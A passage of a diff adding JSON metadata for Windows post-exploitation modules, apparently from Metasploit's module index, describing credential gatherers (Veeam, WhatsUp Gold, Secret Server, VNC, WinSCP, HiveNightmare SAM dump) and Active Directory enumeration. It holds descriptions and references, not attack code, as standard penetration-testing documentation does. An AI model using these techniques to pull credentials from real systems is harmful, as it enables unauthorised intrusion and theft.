"Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for thunderbird credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/thunderbird.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/thunderbird", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/thycotic_secretserver_dump": { + "name": "Delinea Thycotic Secret Server Dump", + "fullname": "post/windows/gather/credentials/thycotic_secretserver_dump", + "aliases": [], + "rank": 0, + "disclosure_date": "2022-08-15", + "type": "post", + "author": [ + "npm " + ], + "description": "This module exports and decrypts Secret Server credentials to a CSV file;\n it is intended as a post-exploitation module for Windows hosts with Delinea/Thycotic\n Secret Server installed. Master Encryption Key (MEK) and associated IV values are\n decrypted from encryption.config using a static key baked into the software. The\n module also supports parameter recovery for encryption configs configured with\n Windows DPAPI.", + "references": [ + "URL-https://github.com/denandz/SecretServerSecretStealer" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-09-29 13:58:54 +0000", + "path": "/modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/thycotic_secretserver_dump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "Dump", + "description": "Export Secret Server database and perform decryption" + }, + { + "name": "Export", + "description": "Export Secret Server database without decryption" + } + ] + }, + "post_windows/gather/credentials/tlen": { + "name": "Tlen credential gatherer", + "fullname": "post/windows/gather/credentials/tlen", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Tlen credentials on a Windows host. Tlen is a free Polish instant messaging service.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/tlen.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/tlen", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/tortoisesvn": { + "name": "Windows Gather TortoiseSVN Saved Password Extraction", + "fullname": "post/windows/gather/credentials/tortoisesvn", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Justin Cacak" + ], + "description": "This module extracts and decrypts saved TortoiseSVN passwords. In\n order for decryption to be successful this module must be executed\n under the same privileges as the user which originally encrypted the\n password.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/tortoisesvn.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/tortoisesvn", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/total_commander": { + "name": "Windows Gather Total Commander Saved Password Extraction", + "fullname": "post/windows/gather/credentials/total_commander", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine " + ], + "description": "This module extracts weakly encrypted saved FTP Passwords from Total Commander.\n It finds saved FTP connections in the wcx_ftp.ini file.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/total_commander.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/total_commander", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/trillian": { + "name": "Windows Gather Trillian Password Extractor", + "fullname": "post/windows/gather/credentials/trillian", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Sil3ntDre4m ", + "Unknown" + ], + "description": "This module extracts account password from Trillian & Trillian Astra\n v4.x-5.x instant messenger.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/trillian.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/trillian", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/veeam_credential_dump": { + "name": "Veeam Backup and Replication Credentials Dump", + "fullname": "post/windows/gather/credentials/veeam_credential_dump", + "aliases": [], + "rank": 0, + "disclosure_date": "2022-11-22", + "type": "post", + "author": [ + "npm " + ], + "description": "This module exports and decrypts credentials from Veeam Backup & Replication and\n Veeam ONE Monitor Server to a CSV file; it is intended as a post-exploitation\n module for Windows hosts with either of these products installed. The module\n supports automatic detection of VBR / Veeam ONE and is capable of decrypting\n credentials for all versions including the latest build of 11.x.", + "references": [ + "URL-https://blog.checkymander.com/red%20team/veeam/decrypt-veeam-passwords/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/post/windows/gather/credentials/veeam_credential_dump.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/veeam_credential_dump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "Decrypt", + "description": "Decrypt Veeam database export CSV files" + }, + { + "name": "Dump", + "description": "Export Veeam databases and perform decryption" + }, + { + "name": "Export", + "description": "Export Veeam databases without decryption" + } + ] + }, + "post_windows/gather/credentials/viber": { + "name": "Viber credential gatherer", + "fullname": "post/windows/gather/credentials/viber", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for credentials in Viber desktop application on a remote Windows host. Viber is a cross-platform voice over IP and instant messaging software application.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/windows/gather/credentials/viber.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/viber", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/vnc": { + "name": "Windows Gather VNC Password Extraction", + "fullname": "post/windows/gather/credentials/vnc", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kurt Grutzmacher ", + "mubix " + ], + "description": "This module extract DES encrypted passwords in known VNC locations", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/vnc.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/vnc", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/whatsupgold_credential_dump": { + "name": "WhatsUp Gold Credentials Dump", + "fullname": "post/windows/gather/credentials/whatsupgold_credential_dump", + "aliases": [], + "rank": 0, + "disclosure_date": "2022-11-22", + "type": "post", + "author": [ + "sshah ", + "npm " + ], + "description": "This module exports and decrypts credentials from WhatsUp Gold to a CSV file;\n it is intended as a post-exploitation module for Windows hosts with WhatsUp\n Gold installed. The module has been tested on and can successfully decrypt\n credentials from WhatsUp versions 11.0 to the latest (22.x). Extracted\n credentials are automatically added to loot.", + "references": [ + "CVE-2022-29845", + "CVE-2022-29846", + "CVE-2022-29847", + "CVE-2022-29848", + "URL-https://nvd.nist.gov/vuln/detail/CVE-2022-29845", + "URL-https://nvd.nist.gov/vuln/detail/CVE-2022-29846", + "URL-https://nvd.nist.gov/vuln/detail/CVE-2022-29847", + "URL-https://nvd.nist.gov/vuln/detail/CVE-2022-29848", + "URL-https://blog.assetnote.io/2022/06/09/whatsup-gold-exploit/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/post/windows/gather/credentials/whatsupgold_credential_dump.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/whatsupgold_credential_dump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "Decrypt", + "description": "Decrypt WhatsUp Gold database export CSV file" + }, + { + "name": "Dump", + "description": "Export WhatsUp Gold database and perform decryption" + }, + { + "name": "Export", + "description": "Export WhatsUp Gold database without decryption" + } + ] + }, + "post_windows/gather/credentials/winbox_settings": { + "name": "Windows Gather Mikrotik Winbox \"Keep Password\" Credentials Extractor", + "fullname": "post/windows/gather/credentials/winbox_settings", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Pasquale 'sid' Fiorillo" + ], + "description": "This module extracts Mikrotik Winbox credentials saved in the\n \"settings.cfg.viw\" file when the \"Keep Password\" option is\n selected in Winbox.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-09 00:43:10 +0000", + "path": "/modules/post/windows/gather/credentials/winbox_settings.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/winbox_settings", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "shell", + "powershell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/windows_autologin": { + "name": "Windows Gather AutoLogin User Credential Extractor", + "fullname": "post/windows/gather/credentials/windows_autologin", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Myo Soe" + ], + "description": "This module extracts the plain-text Windows user login password in Registry.\n It exploits a Windows feature that Windows (2000 to 2008 R2) allows a\n user or third-party Windows Utility tools to configure User AutoLogin via\n plain-text password insertion in (Alt)DefaultPassword field in the registry\n location - HKLM\\Software\\Microsoft\\Windows NT\\WinLogon. This is readable\n by all users.", + "references": [ + "URL-http://support.microsoft.com/kb/315231", + "URL-http://core.yehg.net/lab/#tools.exploits" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/windows_autologin.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/windows_autologin", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/windows_sam_hivenightmare": { + "name": "Windows SAM secrets leak - HiveNightmare", + "fullname": "post/windows/gather/credentials/windows_sam_hivenightmare", + "aliases": [], + "rank": 300, + "disclosure_date": "2021-07-20", + "type": "post", + "author": [ + "Kevin Beaumont", + "romarroca", + "Yann Castel (yann.castel " + ], + "description": "Due to mismanagement of SAM and SYSTEM hives in Windows 10, it is possible for an unprivileged\n user to read those files. But, as they are locked while Windows is running we are not able\n to read them directly. The trick is to take advantage of Volume Shadow Copy, which is generally\n enabled, to finally have a read access. Once SAM and SYSTEM files are successfully dumped and\n stored in `store_loot`, you can dump the hashes with some external scripts like secretsdump.py", + "references": [ + "CVE-2021-36934", + "URL-https://github.com/GossiTheDog/HiveNightmare", + "URL-https://isc.sans.edu/diary/Summer+of+SAM+-+incorrect+permissions+on+Windows+1011+hives/27652", + "URL-https://github.com/romarroca/SeriousSam" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2021-10-06 13:43:31 +0000", + "path": "/modules/post/windows/gather/credentials/windows_sam_hivenightmare.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/windows_sam_hivenightmare", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "HiveNightmare", + "SeriousSAM" + ], + "Reliability": [], + "SideEffects": [], + "Stability": [ + "crash-safe" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/windowslivemail": { + "name": "Windows Live Mail credential gatherer", + "fullname": "post/windows/gather/credentials/windowslivemail", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Windows Live Mail credentials on a Windows host.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/windowslivemail.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/windowslivemail", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/winscp": { + "name": "Windows Gather WinSCP Saved Password Extraction", + "fullname": "post/windows/gather/credentials/winscp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine " + ], + "description": "This module extracts weakly encrypted saved passwords from\n WinSCP. It searches for saved sessions in the Windows Registry\n and the WinSCP.ini file. It cannot decrypt passwords if a master\n password is used.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/winscp.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/winscp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/wsftp_client": { + "name": "Windows Gather WS_FTP Saved Password Extraction", + "fullname": "post/windows/gather/credentials/wsftp_client", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "theLightCosine " + ], + "description": "This module extracts weakly encrypted saved FTP Passwords\n from WS_FTP. It finds saved FTP connections in the ws_ftp.ini file.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-28 09:08:33 +0000", + "path": "/modules/post/windows/gather/credentials/wsftp_client.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/wsftp_client", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/xchat": { + "name": "XChat credential gatherer", + "fullname": "post/windows/gather/credentials/xchat", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kazuyoshi Maruta", + "Daniel Hallsworth", + "Barwar Salim M", + "Z. Cliffe Schreuders" + ], + "description": "PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.\n PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.\n Further details can be found in the module documentation.\n This module searches for Xchat credentials on a Windows host. XChat is an IRC chat program for both Linux and Windows.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/windows/gather/credentials/xchat.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/xchat", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/credentials/xshell_xftp_password": { + "name": "Windows Gather Xshell and Xftp Passwords", + "fullname": "post/windows/gather/credentials/xshell_xftp_password", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kali-Team " + ], + "description": "This module can decrypt the password of xshell and xftp,\n if the user chooses to remember the password.", + "references": [ + "URL-https://github.com/HyperSine/how-does-Xmanager-encrypt-password/blob/master/doc/how-does-Xmanager-encrypt-password.md" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/windows/gather/credentials/xshell_xftp_password.rb", + "is_install_path": true, + "ref_name": "windows/gather/credentials/xshell_xftp_password", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/dnscache_dump": { + "name": "Windows Gather DNS Cache", + "fullname": "post/windows/gather/dnscache_dump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Borja Merino " + ], + "description": "This module displays the records stored in the DNS cache.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/dnscache_dump.rb", + "is_install_path": true, + "ref_name": "windows/gather/dnscache_dump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/dumplinks": { + "name": "Windows Gather Dump Recent Files lnk Info", + "fullname": "post/windows/gather/dumplinks", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "davehull " + ], + "description": "The dumplinks module is a modified port of Harlan Carvey's lslnk.pl Perl script.\n This module will parse .lnk files from a user's Recent Documents folder\n and Microsoft Office's Recent Documents folder, if present.\n Windows creates these link files automatically for many common file types.\n The .lnk files contain time stamps, file locations, including share\n names, volume serial numbers, and more.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/dumplinks.rb", + "is_install_path": true, + "ref_name": "windows/gather/dumplinks", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_ad_bitlocker": { + "name": "Windows Gather Active Directory BitLocker Recovery", + "fullname": "post/windows/gather/enum_ad_bitlocker", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Ben Campbell " + ], + "description": "This module will enumerate BitLocker recovery passwords in the default AD\n directory. This module does require Domain Admin or other delegated privileges.", + "references": [ + "URL-https://technet.microsoft.com/en-us/library/cc771778%28v=ws.10%29.aspx" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_ad_bitlocker.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_ad_bitlocker", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_ad_computers": { + "name": "Windows Gather Active Directory Computers", + "fullname": "post/windows/gather/enum_ad_computers", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Ben Campbell " + ], + "description": "This module will enumerate computers in the default AD directory.\n\n Optional Attributes to use in ATTRIBS:\n objectClass, cn, description, distinguishedName, instanceType, whenCreated,\n whenChanged, uSNCreated, uSNChanged, name, objectGUID,\n userAccountControl, badPwdCount, codePage, countryCode,\n badPasswordTime, lastLogoff, lastLogon, localPolicyFlags,\n pwdLastSet, primaryGroupID, objectSid, accountExpires,\n logonCount, sAMAccountName, sAMAccountType, operatingSystem,\n operatingSystemVersion, operatingSystemServicePack, serverReferenceBL,\n dNSHostName, rIDSetPreferences, servicePrincipalName, objectCategory,\n netbootSCPBL, isCriticalSystemObject, frsComputerReferenceBL,\n lastLogonTimestamp, msDS-SupportedEncryptionTypes\n\n ActiveDirectory has a MAX_SEARCH limit of 1000 by default. Split search up\n if you hit that limit.\n\n Possible filters:\n (objectClass=computer) # All Computers\n (primaryGroupID=516) # All Domain Controllers\n (&(objectCategory=computer)(operatingSystem=*server*)) # All Servers", + "references": [ + "URL-http://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_ad_computers.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_ad_computers", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_ad_groups": { + "name": "Windows Gather Active Directory Groups", + "fullname": "post/windows/gather/enum_ad_groups", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Stuart Morgan " + ], + "description": "This module will enumerate AD groups on the specified domain.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_ad_groups.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_ad_groups", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_ad_managedby_groups": { + "name": "Windows Gather Active Directory Managed Groups", + "fullname": "post/windows/gather/enum_ad_managedby_groups", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Stuart Morgan " + ], + "description": "This module will enumerate AD groups on the specified domain which are specifically managed.\n It cannot at the moment identify whether the 'Manager can update membership list' option\n option set; if so, it would allow that member to update the contents of that group. This\n could either be used as a persistence mechanism (for example, set your user as the 'Domain\n Admins' group manager) or could be used to detect privilege escalation opportunities\n without having domain admin privileges.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_ad_managedby_groups.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_ad_managedby_groups", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_ad_service_principal_names": { + "name": "Windows Gather Active Directory Service Principal Names", + "fullname": "post/windows/gather/enum_ad_service_principal_names", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Ben Campbell ", + "Scott Sutherland" + ], + "description": "This module will enumerate servicePrincipalName in the default AD directory\n where the user is a member of the Domain Admins group.", + "references": [ + "URL-https://www.netspi.com/blog/entryid/214/faster-domain-escalation-using-ldap" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_ad_service_principal_names.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_ad_service_principal_names", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_ad_to_wordlist": { + "name": "Windows Active Directory Wordlist Builder", + "fullname": "post/windows/gather/enum_ad_to_wordlist", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Thomas Ring" + ], + "description": "This module will gather information from the default Active Domain (AD) directory\n and use these words to seed a wordlist. By default it enumerates user accounts to\n build the wordlist.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_ad_to_wordlist.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_ad_to_wordlist", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_ad_user_comments": { + "name": "Windows Gather Active Directory User Comments", + "fullname": "post/windows/gather/enum_ad_user_comments", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Ben Campbell " + ], + "description": "This module will enumerate user accounts in the default Active Domain (AD) directory which\n contain 'pass' in their description or comment (case-insensitive) by default. In some cases,\n such users have their passwords specified in these fields.", + "references": [ + "URL-http://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 11:23:07 +0000", + "path": "/modules/post/windows/gather/enum_ad_user_comments.rb", + "is_install_path": true, + "ref_name": "windows/gather/enum_ad_user_comments", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_windows/gather/enum_ad_users": { + "name": "Windows Gather Active Directory Users", + "fullname": "post/windows/gather/enum_ad_users", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Ben Campbell ", + "Carlos Perez ", + "Stuart Morgan " + ], + "description": "This module will enumerate user accounts in the default Active Domain (AD) directory and stores\n them in the 